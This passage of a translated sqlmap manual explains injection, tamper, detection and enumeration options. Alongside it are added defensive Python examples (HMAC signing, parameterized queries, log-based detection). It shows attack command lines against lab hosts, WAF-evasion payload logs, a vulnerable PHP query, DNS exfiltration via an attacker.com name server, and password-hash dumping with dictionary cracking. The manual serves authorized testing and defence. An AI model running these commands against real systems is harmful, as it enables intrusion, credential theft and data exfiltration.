You can specify the name of a parameter whose value should be changed randomly on each request. The length and type of the random value are derived from the original value supplied.

Extract targets from the proxy log using a regular expression

Option: --scope

You can specify a valid Python regular expression to filter the targets parsed from the log supplied with option -l, instead of testing every host found there.

Example of valid syntax:

$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

Avoid session destruction caused by too many failed requests

Options: --safe-url, --safe-post, --safe-req and --safe-freq

Sometimes, after a certain number of failed requests, the web application or an intrusion detection mechanism destroys the session. This can happen during sqlmap's detection phase or while it exploits any of the blind SQL injection techniques, because the SQL payloads do not necessarily return output and may therefore trip the application's session management or detection logic.

To bypass this restriction on the target site you can provide any (or a combination) of the following options:

  • --safe-url: a URL that can be visited safely and frequently during testing.
  • --safe-post: HTTP POST data to send to the safe URL.
  • --safe-req: load and use a safe HTTP request from a file.
  • --safe-freq: how many target test requests to send between two visits to the safe URL.

In this way, sqlmap visits the safe URL every given number of requests without performing any kind of injection on it.

Turn off URL encoding for parameter values

Switch: --skip-urlencode

Depending on where a parameter appears (for example: GET), its value may be URL-encoded by default. In some cases the back-end web server does not follow the RFC standards and requires parameter values to be sent in their raw, non-encoded form. In that case, use --skip-urlencode.

Bypass anti CSRF protection

Options: --csrf-token and --csrf-url

Many sites use an anti-CSRF token: a hidden field whose value is set randomly in each page response. sqlmap automatically tries to identify and bypass this protection, and the options --csrf-token and --csrf-url are available for further tuning. The option --csrf-token sets the name of the hidden field holding the random token; this is useful when the site uses a non-standard name for that field. The option --csrf-url retrieves the token value from an arbitrary valid URL; this is useful when the target URL does not itself contain the required token and it has to be extracted from elsewhere.

Enforce SSL/HTTPS

Switch: --force-ssl

Use this switch to force SSL/HTTPS requests to the target. It is useful when collecting URLs with the option --crawl or when supplying Burp logs with option -l.

Run custom Python code during each request

Option: --eval

If you want to change (or add) parameter values before each request because of some known dependency between them, use the option --eval to supply custom Python code that sqlmap evaluates before each request.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b9238\
20dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

On each request, the MD5 hash of the current id parameter value in the GET request is recalculated and replaces the original hash parameter value.
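The caveat a defender should take from this: a hash that depends only on values visible in the request can always be recomputed by whoever sends the request, which is exactly what the --eval line does. The added example below (mine, not from the page or from sqlmap) puts that check beside a keyed HMAC over the same parameter, which cannot be recomputed without the server-side secret. The secret value is a constructed placeholder.

```python
import hashlib
import hmac

# Constructed server-side secret (assumption; not from the page). A real
# deployment keeps this out of the code base and rotates it.
SERVER_SECRET = b"demo-secret-not-from-the-page"


def recompute_hash_like_eval(id_value: str) -> dict:
    """What the page's --eval snippet does before every request:
    hash = md5(id), computed from nothing but the visible id."""
    return {"id": id_value,
            "hash": hashlib.md5(id_value.encode()).hexdigest()}


def weak_check(params: dict) -> bool:
    """Server-side check matching the page's scheme: anyone who can read
    the id can produce a valid hash, so it only stops careless tampering."""
    expected = hashlib.md5(params["id"].encode()).hexdigest()
    return hmac.compare_digest(params["hash"], expected)


def sign(id_value: str) -> str:
    """Keyed tag over the parameter: without SERVER_SECRET the client
    cannot recompute it for a different id."""
    return hmac.new(SERVER_SECRET, id_value.encode(), "sha256").hexdigest()


def strong_check(params: dict) -> bool:
    """Constant-time comparison against the keyed tag."""
    return hmac.compare_digest(params["hash"], sign(params["id"]))
```

The hash in the page's command line is md5("1"); recompute_hash_like_eval("1") reproduces it, and weak_check accepts a recomputed hash for any other id, while strong_check rejects it.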

Optimization

The following switches can be used to optimize the performance of sqlmap.

Batch optimization

Switch: -o

Setting this switch implicitly turns on the following options and switches:

  • --keep-alive
  • --null-connection
  • --threads=3 (a larger value can be set)

See below for more details on these settings.

Output prediction

Switch: --predict-output

This switch turns on an inference algorithm that analyses the statistical character distribution of the data retrieved so far and, using the entries in txt/common-outputs.txt together with some set theory, predicts the most likely next character and builds a character statistics table. If the value being retrieved matches one of the common outputs, the candidate set for each following character shrinks progressively. The speed-up is most noticeable when retrieving DBMS instances, table names and the corresponding privileges. You can of course edit the common-outputs file to suit your needs, for example when you notice common patterns in database table names or other values.

Note that this switch cannot be used together with --threads.

HTTP Keep-Alive

Switch: --keep-alive

This switch makes sqlmap use persistent HTTP(S) connections.

Note that this switch cannot be used together with --proxy.

HTTP NULL connection

Switch: --null-connection

There are special HTTP request types that retrieve the size of an HTTP response without retrieving the HTTP body. This technique can be used in blind SQL injection to distinguish a True response from a False one. When this switch is on, sqlmap tests for and uses two NULL-connection techniques: Range and HEAD. If the target server supports either of them, less bandwidth is used and the whole test runs faster.

Details of these techniques are given in the white paper Bursting Performances in Blind SQL Injection - Take 2 (Bandwidth).

Note that this switch cannot be used together with --text-only.

Concurrent HTTP(S) requests

Option: --threads

sqlmap lets you set the maximum number of concurrent HTTP(S) requests. This feature relies on multithreading and therefore inherits its advantages and drawbacks.

It can be used when data is retrieved through blind SQL injection techniques or when using the brute-force switches. For blind SQL injection, sqlmap first retrieves the length of the query output in a single thread, then starts the threads and assigns each one a character of the output. When the character is retrieved, the thread ends and exits. Combined with the bisection algorithm implemented in sqlmap, each thread sends at most 7 HTTP(S) requests per character.

Given performance considerations and the reliability of the target site, the maximum number of concurrent requests in sqlmap is capped at 10.

Note that this option cannot be used together with --predict-output.
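The 7-request figure follows from bisection over the 7-bit character range: each oracle answer halves the candidate set, and 128 = 2^7. The added example below (mine, not sqlmap code) checks that bound exhaustively against a local comparison oracle and then turns it into a request-volume estimate, which is what you need on the defending side to size rate limits or anomaly thresholds for a boolean-based blind retrieval. The hostname used as sample input is the one shown later on this page; the preliminary length query sqlmap sends is left out of the count.

```python
import math


def bisect_char(oracle, lo: int = 0, hi: int = 127) -> tuple:
    """Recover one character's code point with the bisection sqlmap uses:
    oracle(x) answers whether the unknown code point is greater than x.
    Returns (code_point, number_of_oracle_calls)."""
    calls = 0
    while lo < hi:
        mid = (lo + hi) // 2
        calls += 1
        if oracle(mid):      # the unknown character is above mid
            lo = mid + 1
        else:                # the unknown character is mid or below
            hi = mid
    return lo, calls


def max_calls_per_char() -> int:
    """Exhaustively check the bound: every 7-bit value takes exactly 7 calls
    (128 candidates halved down to 1)."""
    worst = 0
    for secret in range(128):
        found, calls = bisect_char(lambda x, s=secret: s > x)
        assert found == secret, "bisection must recover the value"
        worst = max(worst, calls)
    return worst


def estimate_requests(value: str, threads: int = 10) -> dict:
    """Request volume a blind retrieval of `value` generates: 7 per character,
    spread over at most `threads` parallel streams (the page's cap is 10)."""
    n = len(value)
    return {"chars": n,
            "requests": 7 * n,
            "rounds": math.ceil(n / threads)}
```

For the 15-character hostname retrieved in the --hostname example further down, that is 105 near-identical requests in two rounds of ten, a burst a web server log or WAF counter can key on.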

Injection

The following options are used to specify which parameters to test, and to supply custom injection payloads and optional tamper scripts.

Testable parameters

Options: -p, --skip and --param-exclude

By default sqlmap tests all GET and POST parameters. When --level is >= 2 it also tests the HTTP Cookie header value, and when --level is >= 3 it also tests the HTTP User-Agent and Referer header values. You can also manually specify a comma-separated list of parameters for sqlmap to test; this overrides the --level setting.

For example, to test only the GET parameter id and the HTTP User-Agent, provide -p "id,user-agent".

To exclude some parameters from testing, use the option --skip. This is useful when you want a high --level value and all available parameters tested except some of the HTTP headers that are normally tested.

For example, to skip the HTTP User-Agent and Referer headers at --level=5, provide --skip="user-agent,referer".

You can also exclude parameters from testing with a regular expression on the parameter name, using the option --param-exclude.

For example, to skip parameters whose name contains token or session, provide --param-exclude="token|session".

URI injection point

There are special cases where the injection point is within the URI itself. sqlmap does not test URI paths automatically unless told to. You mark these injection points on the command line by appending an asterisk (*) after each URI segment you want sqlmap to test for SQL injection (Havij-style %INJECT HERE% is also supported).

This is particularly useful, for example, when the web application uses the Apache web server's mod_rewrite module or a similar technology.

An example of a valid command line:

$ python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

Arbitrary injection point

Similar to URI injection points, the asterisk (*) (Havij-style %INJECT HERE% is also supported) can mark arbitrary injection points in GET, POST or HTTP header values. You can mark a GET parameter value in option -u, a POST parameter value in option --data, an HTTP header value in options such as -H, --headers, --user-agent, --referer and/or --cookie, or a general location in an HTTP request loaded from a file.

An example of a valid command line:

$ python sqlmap.py -u "http://targeturl" --cookie="param1=value1*;param2=value2"

Specify DBMS type

Option: --dbms

By default sqlmap automatically detects the web application's back-end DBMS. sqlmap fully supports the following database management systems:

  • MySQL
  • Oracle
  • PostgreSQL
  • Microsoft SQL Server
  • Microsoft Access
  • IBM DB2
  • SQLite
  • Firebird
  • Sybase
  • SAP MaxDB
  • HSQLDB
  • Informix

If for some reason sqlmap identifies the SQL injection but cannot detect the back-end DBMS type, or you want to avoid fingerprinting, you can provide the back-end DBMS name yourself (for example: postgresql). MySQL and Microsoft SQL Server can be given as MySQL <version> and Microsoft SQL Server <version> respectively, where <version> is a valid DBMS version; for example 5.0 for MySQL and 2005 for Microsoft SQL Server.

If you use --dbms together with --fingerprint, sqlmap performs extensive fingerprinting only for the specified DBMS. Read on for more details.

Note that this option is not mandatory, and it is strongly recommended to use it only if you are absolutely sure of the back-end DBMS. If you are not, let sqlmap fingerprint it automatically.

Specify the DBMS operating system name

Option: --os

By default, when any switch or option depends on this information, sqlmap automatically detects the operating system underlying the web application's back-end DBMS. Currently the fully supported operating systems are:

  • Linux
  • Windows

You can force a known operating system name so that sqlmap skips detecting it.

Note that this option is not mandatory, and it is strongly recommended to use it only if you are absolutely sure of the operating system underlying the back-end DBMS. If you are not, let sqlmap detect it automatically.

Use large numbers to invalidate parameter values

Switch: --invalid-bignum

When sqlmap needs to invalidate the original parameter value (for example: id=13), it uses a negative number (for example: id=-13). Use this switch to force the use of large integer values instead (for example: id=9999999).

Use logical operations to invalidate parameter values

Switch: --invalid-logical

When sqlmap needs to invalidate the original parameter value (for example: id=13), it uses a negative number (for example: id=-13). Use this switch to force the use of Boolean operations instead (for example: id=13 AND 18=19).

Use random strings to invalidate parameter values

Switch: --invalid-string

When sqlmap needs to invalidate the original parameter value (for example: id=13), it uses a negative number (for example: id=-13). Use this switch to force the use of random strings instead (for example: id=akewmc).

Turn off the payload casting mechanism

Switch: --no-cast

When retrieving results, sqlmap casts all entries to the string type and replaces NULL values with a blank character. This avoids error states (for example, concatenating a NULL value with a string) and simplifies the data retrieval process itself. However, it has been reported that in some cases (for example, older versions of MySQL) this mechanism has to be turned off (with this switch) because of problems with the retrieval itself (for example, None values being returned).

Turn off the string escaping mechanism

Switch: --no-escape

When sqlmap needs to use a string in a payload (delimited by single quotes, for example SELECT 'foobar'), the value is escaped automatically (for example SELECT CHAR(102)+CHAR(111)+CHAR(111)+CHAR(98)+CHAR(97)+CHAR(114)). This is done for two reasons: to obfuscate the payload content and to avoid potential query escaping mechanisms on the back-end server (for example magic_quotes and/or mysql_real_escape_string). You can turn it off with this switch (for example, when you need to reduce the payload size).

Custom injection payload

Options: --prefix and --suffix

In some cases a vulnerable parameter can only be exploited if the user provides a specific suffix to append to the injected payload. These options also come in handy when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing the payload prefix and suffix.

Vulnerable source code example:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

To detect and exploit this SQL injection, you can either let sqlmap detect the boundaries (the combination of SQL payload prefix and suffix) during the detection phase, or provide them yourself.

For example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php\
?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
[...]

This makes every sqlmap request end up in a query of the following form:

$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";

which keeps the query syntactically correct.

In this simple example sqlmap could detect and exploit the SQL injection without custom boundaries, but in real-world applications, for instance when the injection point is inside nested JOIN queries, they sometimes need to be provided.
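To see why the boundaries matter, the following added example (mine, not from the page or from sqlmap) rebuilds the page's vulnerable query in Python against an in-memory SQLite table, places it beside the parameterized form, and feeds both the prefix/suffix string used above. SQLite accepts the same LIMIT 0, 1 syntax; the users table and its rows are constructed for the demo.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample table (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Mirrors the PHP on the page: the request value is pasted into the SQL
    text, so a value carrying the ') prefix closes the literal and the
    bracket, and the AND ('abc'='abc suffix re-balances what follows."""
    query = "SELECT * FROM users WHERE id=('" + user_id + "') LIMIT 0, 1"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened form: the value travels as a bound parameter and is compared
    as data, never parsed as SQL, so the same input simply matches no row."""
    query = "SELECT * FROM users WHERE id=(?) LIMIT 0, 1"
    return conn.execute(query, (user_id,)).fetchall()


# Boundary strings taken from the sqlmap command line on the page.
PREFIX = "')"
SUFFIX = "AND ('abc'='abc"


def probe(conn: sqlite3.Connection, condition: str) -> dict:
    """Send id=1 with a condition spliced between the page's prefix and
    suffix to both lookups and report what each returns."""
    value = "1" + PREFIX + " " + condition + " " + SUFFIX
    return {"vulnerable": lookup_vulnerable(conn, value),
            "parameterized": lookup_parameterized(conn, value)}
```

With the vulnerable lookup, the true condition 'a'='a' returns alice and the false one 'a'='b' returns nothing, which is the boolean oracle sqlmap builds on; the parameterized lookup returns nothing in both cases.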

Tamper injection data

Option: --tamper

sqlmap itself does not obfuscate the payloads it sends, except that strings between single quotes are replaced with their CHAR()-alike representation.

This option is useful when there is a weak input validation mechanism between the user input and the back-end DBMS. Such a mechanism is usually a home-grown input validation routine called by the application source code, an expensive enterprise IPS appliance, or a web application firewall (WAF). In short, they are implemented in many different ways and usually cost a lot of money.

To use this option you supply sqlmap with a comma-separated list of tamper scripts, which process the payload and return the transformed result. You can write your own tamper scripts, edit and use the ones in the tamper/ directory, and chain them as comma-separated values of the --tamper option (for example: --tamper="between,randomcase").

A valid tamper script has the following format:

# Needed imports
from lib.core.enums import PRIORITY

# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL

def tamper(payload):
    '''
    Description of your tamper script
    '''

    retVal = payload

    # your code to tamper the original payload

    # return the tampered payload
    return retVal

You can find the valid and available tamper scripts in the tamper/ directory.

Example against a MySQL target, assuming the > character, spaces and uppercase SELECT strings are disallowed:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

[hh:mm:03] [DEBUG] cleaning up configuration parameters
[hh:mm:03] [INFO] loading tamper script 'between'
[hh:mm:03] [INFO] loading tamper script 'randomcase'
[hh:mm:03] [INFO] loading tamper script 'space2comment'
[...]
[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
[...]
[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar(58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/group/**/bY/**/x)a)
[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[...]
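As an added example (mine, not from the page or from sqlmap), here is the defender's side of the tamper run above: between, randomcase and space2comment change keyword case, replace spaces with inline comments and rewrite the > operator, so a detection rule that matches the raw request string misses them. The snippet normalizes the query string first and only then applies two signatures derived from the payload shapes shown above. The log lines are constructed, and the assumption that the between script emits NOT BETWEEN 0 AND in place of > is mine, not stated on the page.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log (not from the page). Lines 2-4 carry
# payloads shaped like the ones in the tamper run above; lines 1 and 5 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jan/2022:21:15:20 +0100] "GET /get_int.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [28/Jan/2022:21:15:21 +0100] "GET /get_int.php?id=1)/**/And/**/1369=7706/**/And/**/(4092=4092 HTTP/1.1" 200 512
10.0.0.5 - - [28/Jan/2022:21:15:21 +0100] "GET /get_int.php?id=1/**/AnD/**/950=7041 HTTP/1.1" 200 498
10.0.0.5 - - [28/Jan/2022:21:15:22 +0100] "GET /get_int.php?id=1%2F%2A%2A%2FaNd%2F%2A%2A%2F1%20NOT%20BETWEEN%200%20AND%201 HTTP/1.1" 200 498
10.0.0.7 - - [28/Jan/2022:21:15:23 +0100] "GET /search.php?q=and+or HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
COMMENT_RE = re.compile(r"/\*.*?\*/")

# Signatures run against the *normalized* query, so the evasions above
# (space2comment, randomcase, percent-encoding) no longer hide the payload.
RULES = {
    # "AND 1369=7706", "AND (4092=4092": boolean-based blind probes
    "boolean-compare": re.compile(r"\b(?:and|or)\b\s*\(*\s*\d+\s*=\s*\d+"),
    # "NOT BETWEEN 0 AND": assumed rewrite of '>' by the between tamper script
    "not-between": re.compile(r"\bnot\s+between\s+0\s+and\b"),
}


def normalize(query: str) -> str:
    """Undo the layers a naive filter skips: percent-decoding, inline
    comments standing in for spaces, mixed case, repeated whitespace."""
    decoded = unquote_plus(query)
    without_comments = COMMENT_RE.sub(" ", decoded)
    return re.sub(r"\s+", " ", without_comments).strip().lower()


def flag_suspicious(log_text: str) -> list:
    """Return one record per log line whose query string matches a rule."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group(1):
            continue
        query = normalize(m.group(1).split("?", 1)[1])
        for name, rule in RULES.items():
            if rule.search(query):
                hits.append({"line": lineno, "rule": name, "query": query})
                break
    return hits
```

Normalization before matching is the whole point: the same two rules applied to the raw lines would miss the percent-encoded request and would have to enumerate every case and comment variant the tamper scripts can produce.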

Detection

The following options can be used to customize the detection phase.

Level

Option: --level

This option requires an argument specifying the level of tests to perform. There are five levels. The default is 1, which performs a limited number of tests (requests); level 5 tests a much wider range of payloads and boundaries (the prefixes and suffixes around the SQL payloads). The payloads sqlmap uses are loaded from the text file xml/payloads.xml, following the instructions at the top of that file. If sqlmap misses a specific injection, you can edit that file to add the payload needed to detect it.

This option affects not only the payloads sqlmap uses but also which injection points are tested: GET and POST parameters are always tested, HTTP Cookie header values are tested at level >= 2, and HTTP User-Agent/Referer header values at level >= 3.

In short, the harder a SQL injection is to detect, the higher --level needs to be set.

It is strongly recommended to try a higher --level before reporting to the sqlmap mailing list that it cannot detect a particular injection.

Risk

Option: --risk

This option requires an argument specifying the risk of the tests to perform. There are three risk levels. The default is 1, which is harmless for the majority of SQL injection points. Risk 2 adds heavy time-based blind injection tests to the default set, and risk 3 additionally adds OR-based Boolean blind injection tests.

In some scenarios, such as SQL injection in an UPDATE statement, injecting an OR-based payload would update every record of the target table, which is obviously not what the attacker wants. For this and similar scenarios sqlmap introduced the --risk option: it lets the user choose which payloads are tested and, at will, whether potentially dangerous ones are used. As mentioned for the option above, the payloads sqlmap uses are stored in the text file xml/payloads.xml, which the user can edit and extend.

Page comparison

Options: --string, --not-string, --regexp and --code

By default, a True query is distinguished from a False query (the concept behind Boolean-based blind SQL injection) by comparing the page returned after injection with the original page.

This reference approach is not always reliable, because the page content may change on each request even without injection: for example a page counter, a dynamic advertisement banner, or any content rendered based on time rather than user input. To avoid such cases sqlmap tries to identify these snippets of the response body and handle them accordingly. Sometimes it fails, which is why sqlmap lets the user provide a string (option --string) that must appear on the original page (though this is not mandatory) and on all True pages, but never on False pages. Instead of a static string the user can provide a regular expression (option --regexp). In addition, the user can provide a string (option --not-string) that does not appear on the original page or on any True page, but always appears on False pages.

Such a string is easily obtained by injecting an invalid value into the parameter and manually comparing the original (non-injected) page with the injected page. With this approach the page comparison is based on matching the user-supplied string or regular expression.

If the user knows that True and False queries can be distinguished by the HTTP status code (for example, 200 for True and 401 for False), this can be given to sqlmap (for example: --code=200).

Switches: --text-only and --titles

If users know that True and False queries can be distinguished by the HTML title (for example, Welcome for True and Forbidden for False), they can turn on title-based comparison with --titles.

If the HTTP responses contain a lot of non-textual content (scripts, nested elements, etc.), you can compare only the textual content of the pages (switch --text-only) by filtering everything else out. In most cases this automatically tunes the detection engine.

Techniques

The following options can be used to tweak the testing of specific SQL injection techniques.

SQL injection techniques to use during testing

Option: --technique

This option specifies the type of SQL injection to test. By default sqlmap tests all the types/techniques it supports.

In some cases you may want to test only one or a few specific types, which is what this option is for.

This option requires an argument: a string made of the letters B, E, U, S, T and Q, each of which represents a technique:

  • B: Boolean-based blind
  • E: error-based
  • U: UNION query-based
  • S: stacked queries
  • T: time-based blind
  • Q: inline queries

For example, to test only error-based and stacked query injection, provide ES. The default value is BEUSTQ.

Note that when you need to access the file system, take over the operating system or access the Windows registry hives, the supplied string must contain the letter S for stacked queries.

Seconds to delay the DBMS response for time-based blind injection

Option: --time-sec

Provide an integer to --time-sec to set the delay used in time-based blind injection. By default its value is 5 seconds.

Number of columns to test for UNION query injection

Option: --union-cols

By default sqlmap tests UNION query injection with 1 to 10 columns. You can extend this range up to 50 columns by providing a higher --level value; see the relevant paragraph for details.

You can manually provide the option --union-cols with a range of numbers to test a specific range of columns for this type of SQL injection. For example, 12-16 tests UNION query injection with 12 to 16 columns.

Character to use for testing UNION query injection

Option: --union-char

By default sqlmap tests UNION query injection using NULL. However, with a higher --level value sqlmap also tests with random numbers, because there are some corner cases where UNION query injection with NULL fails while a random integer succeeds.

You can manually provide the option --union-char with the desired number (for example: --union-char 123) to test this type of SQL injection.

Table to use in the FROM clause for UNION query injection

Option: --union-from

In some UNION query injection cases a valid and accessible table name must be used in the FROM clause. Microsoft Access, for example, requires such a table; without it UNION query injection does not work properly (for example: --union-from=users).

DNS exfiltration attack

Option: --dns-domain

DNS exfiltration in SQL injection attacks is described in the paper Data Retrieval over DNS in SQL Injection Attacks (a Chinese translation, Using DNS to get data in SQL injection, is available in the dark cloud knowledge base), and its implementation in sqlmap is presented in the slides DNS exfiltration attack using sqlmap.

If the user controls a host registered as the DNS name server for a domain (for example: attacker.com), this attack can be enabled with this option (for example: --dns-domain attacker.com). The prerequisites are that sqlmap runs with Administrator privileges (because privileged port 53 has to be used) and that one of the usual (blind) techniques is usable. When an effective technique (preferably time-based blind) has already been identified, this attack speeds up data retrieval. If error-based or UNION query techniques are available, the DNS exfiltration test is skipped by default.

Second-order SQL injection attack

Option: --second-order

When the payload injected into a vulnerable page produces a result that is displayed (reflected) on another page (for example a frame), this is called a second-order SQL injection attack. Usually the user input on the original page is stored in the database, which is what causes the vulnerability.

You can manually provide the option --second-order with the URL of the page that displays the result to test this type of SQL injection.

Fingerprint

Extensive DBMS fingerprinting

Switch: -f or --fingerprint

By default sqlmap automatically fingerprints the web application's back-end DBMS. At the end of the detection phase, when the user is prompted to choose which injectable parameter to use, sqlmap fingerprints the back-end DBMS and, according to the specific database architecture, adopts the appropriate SQL syntax, dialect and queries for the rest of the attack.

If you want extensive DBMS fingerprinting based on specific SQL dialects and in-band error messages, provide the --fingerprint switch. sqlmap then sends more requests and fingerprints the exact DBMS version and, where possible, the operating system, system architecture and patch level.

If you want even more accurate fingerprinting results, you can also provide the switch -b or --banner.

Enumeration

The following options can be used to enumerate back-end DBMS information, table structures and the data contained in tables. You can also run your own SQL statements.

Retrieve everything

Switch: --all

Users who want to retrieve everything remotely accessible with a single switch can use this one. This is generally not recommended, because it generates a large number of requests and retrieves both useful and useless data.

Banner

Switch: -b or --banner

Most modern DBMS have a function and/or an environment variable that returns the DBMS version and, eventually, details on the underlying system and its patch level. Usually the function is version() and the environment variable is @@version, depending on the target DBMS.

Example for an Oracle target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -\
-banner

[...]
[xx:xx:11] [INFO] fetching banner
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

Current session user

Switch: --current-user

With this switch you can retrieve the DBMS user that the web application uses to perform its database queries.

Current database

Switch: --current-db

With this switch you can retrieve the name of the database that the web application is connected to.

Server host name

Switch: --hostname

With this switch you can retrieve the host name of the DBMS server.

Example for a MySQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
hostname

[...]
[xx:xx:04] [INFO] fetching server hostname
[xx:xx:04] [INFO] retrieved: debian-5.0-i386
hostname:    'debian-5.0-i386'

Detect whether the session user is a database administrator

Switch: --is-dba

This detects whether the current DBMS session user is a database administrator (DBA). sqlmap returns True if it is and False otherwise.

List DBMS users

Switch: --users

If the session user has read access to the system table containing DBMS user information, you can enumerate the list of users.

List and crack DBMS user password hashes

Switch: --passwords

If the session user has read access to the system table containing DBMS user passwords, you can enumerate the password hash of each DBMS user. sqlmap first enumerates the users, then the password hashes belonging to each of them.

Example for a PostgreSQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --\
passwords -v 1

[...]
back-end DBMS: PostgreSQL
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt] 
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
    password hash: md5d7d880f96044b72d0bba108ace96d1e4
    clear-text password: testpass
[*] testuser [1]:
    password hash: md599e5ea7a6f7c3269995cba3927fd0093
    clear-text password: testpass

In the example above, sqlmap not only enumerated the DBMS users and their password hashes, but also recognised that the hash format is PostgreSQL's, asked whether to run a dictionary attack against the retrieved hashes with the supplied wordlist, and recovered the clear-text passwords of user postgres (usually the DBA) and user testuser.

This function has been implemented for DBMS that can enumerate user password hashes, including Oracle and Microsoft SQL Server 2005 and subsequent versions.

You can also use the -U option to specify which users to enumerate and crack. If you provide CU as the user name, sqlmap treats it as an alias for the current user and retrieves that user's password hash.

List all user permissions of DBMS

Switch: --privileges

If the current session user has read privileges on the system table containing DBMS user information, the privileges of each DBMS user can be enumerated. From the privilege information, sqlmap also indicates which users are database administrators.

You can also use the -U option to specify the user whose privileges to enumerate.

If you provide CU as the user name, sqlmap treats it as an alias for the current user and retrieves that user's privileges.

In Microsoft SQL Server, this function will display whether each user is a database administrator, rather than the permission list of all users.

List all user roles of DBMS

Switch: --roles

If the current session user has read permission to the system table containing DBMS user information, the role of each DBMS user can be listed.

You can also use the -U option to specify the users whose roles to enumerate.

If you provide CU as the user name, sqlmap treats it as an alias for the current user and retrieves that user's roles.

This feature is only available when the DBMS is Oracle.

List all DBMS databases

Switch: --dbs

If the current session user has read privileges on the system table containing information about the DBMS databases, the available databases can be enumerated.

Enumerating data tables

Switches and option: --tables, --exclude-sysdbs and -D

If the current session user has read permission to the system table containing DBMS data table information, the data table of a specific DBMS can be listed.

If you do not provide a specific database with option -D, sqlmap enumerates the tables of all DBMS databases.

You can also provide the switch --exclude-sysdbs to exclude all system databases.

Note that for Oracle, you need to provide TABLESPACE_NAME instead of the database name.

Enumerate the column names of the data table

Switch and options: --columns, -C, -T and -D

If the current session user has read privileges on the system table containing DBMS table information, the column names of a specific table can be enumerated. sqlmap also enumerates the data type of every column.

This feature depends on option -T to specify the table name and, optionally, on option -D to specify the database name. If no database name is specified, the current database is used. You can also use option -C to restrict the enumeration to specific column names.

Example for SQLite target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" -\
-columns -D testdb -T users -C name
[...]
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| id      | INTEGER |
| name    | TEXT    |
| surname | TEXT    |
+---------+---------+

Note that for PostgreSQL you have to provide the name of a system database or public instead of a database name. This is because the tables of other databases cannot be enumerated: only the tables in the schema that the web application's user is connected to can be listed, and that schema is always aliased public.

Enumerate DBMS schema

Switches: --schema and --exclude-sysdbs

Use this switch to enumerate the DBMS schema. The schema listing contains all databases, tables and columns together with their respective types. Combined with --exclude-sysdbs, only the schema of non-system databases is retrieved and shown.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --s\
chema --batch --exclude-sysdbs

[...]
Database: owasp10
Table: accounts
[4 columns]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| cid         | int(11) |
| mysignature | text    |
| password    | text    |
| username    | text    |
+-------------+---------+

Database: owasp10
Table: blogs_table
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| date         | datetime |
| blogger_name | text     |
| cid          | int(11)  |
| comment      | text     |
+--------------+----------+

Database: owasp10
Table: hitlog
[6 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| date     | datetime |
| browser  | text     |
